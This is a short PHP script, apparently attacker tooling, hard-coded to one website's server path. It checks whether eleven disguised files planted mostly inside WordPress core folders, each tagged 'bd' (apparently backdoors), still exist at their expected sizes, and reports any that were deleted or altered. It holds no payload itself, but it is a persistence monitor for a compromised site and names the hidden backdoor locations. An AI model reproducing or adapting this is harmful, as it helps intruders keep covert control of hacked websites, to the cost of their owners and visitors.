<?php $r = '/home/lesszaxz/ubdcenter.org'; $x = ["/wp-includes/blocks/comments-pagination-numbers/fujifilm.php"=>"bd@@4391@@615",
"/wp-includes/sodium_compat/src/Core32/ChaCha20/class.filter.php"=>"bd@@102768@@598",
"/stray/coffin/default_done.php"=>"bd@@102773@@672",
"/artificially/promotable/platform.php"=>"bd@@102775@@1604",
"/artificially/punishable/comment_function.php"=>"bd@@102776@@2035",
"/wp-includes/css/dist/preferences/class.filter.php"=>"bd@@102781@@1655",
"/wp-includes/sodium_compat/src/Core32/Curve25519/phocagalleryu.php"=>"bd@@11977@@1663",
"/wp-includes/js/tinymce/wp.tinymce.php"=>"bd@@11989@@1739",
"/wp-includes/js/tinymce/plugins/textcolor/officeStaffEN.php"=>"bd@@12009@@644",
"/wp-includes/blocks/footnotes/corpo_mod.php"=>"bd@@12014@@703",
"/wp-includes/blocks/page-list/ma_show.php"=>"bd@@12016@@600"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');